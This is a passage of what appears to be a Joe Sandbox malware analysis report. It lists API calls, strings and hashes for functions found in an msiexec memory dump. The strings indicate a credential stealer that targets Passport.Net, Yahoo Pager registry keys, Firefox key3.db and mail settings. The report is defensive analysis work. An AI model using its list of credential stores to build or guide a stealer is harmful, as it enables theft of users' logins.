                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                              • strlen.MSVCRT ref: 0040F7BE
                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Passport.Net\*
                                                              • API String ID: 2329438634-3671122194
                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                              Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                              • memset.MSVCRT ref: 0040330B
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                              • strchr.MSVCRT ref: 0040335A
                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                              • strlen.MSVCRT ref: 0040339C
                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                              Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessagesprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 1670431679-1552265934
                                                              • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                              • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                              • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                              • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                              Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                              • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                              • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                              • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                              • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                              Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: H
                                                              • API String ID: 2221118986-2852464175
                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                              Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                              • API String ID: 3510742995-3170954634
                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                              Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                              • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 231171946-3708268960
                                                              • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                              • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                              • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                              • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                              Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: winWrite1$winWrite2
                                                              • API String ID: 438689982-3457389245
                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                              Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: winRead
                                                              • API String ID: 1297977491-2759563040
                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                              Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0044955B
                                                              • memset.MSVCRT ref: 0044956B
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                              Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              • memset.MSVCRT ref: 0040AB9C
                                                                • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                              • sprintf.MSVCRT ref: 0040ABE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 3337535707-2769808009
                                                              • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                              • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                              • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                              • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                              Function 00444551 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID$`{g
                                                              • API String ID: 3363972335-420339233
                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                              Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004090C2
                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                              Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                              • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                              • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                              • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                              • String ID:
                                                              • API String ID: 2374668499-0
                                                              • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                              • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                              • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                              • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                              Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040AD5B
                                                              • memset.MSVCRT ref: 0040AD71
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                              • sprintf.MSVCRT ref: 0040ADA8
                                                              Strings
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                              • <%s>, xrefs: 0040ADA2
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3699762281-1998499579
                                                              • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                              • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                              • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                              • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                              Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                              • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                              • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                              • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                              Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                              • free.MSVCRT ref: 00409B00
                                                                • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                              • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                              • Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                              • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                              Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                              • String ID:
                                                              • API String ID: 2775283111-0
                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                              • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                              Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                              • API String ID: 885266447-2471937615
                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                              • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                              Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                              • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@CloseHandleReadSize
                                                              • String ID: Ul@$key3.db
                                                              • API String ID: 3013762397-1563549157
                                                              • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                              • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                              • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                              • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                              Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$_mbscpy
                                                              • String ID: smtp
                                                              • API String ID: 2625860049-60245459
                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                              Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C28C
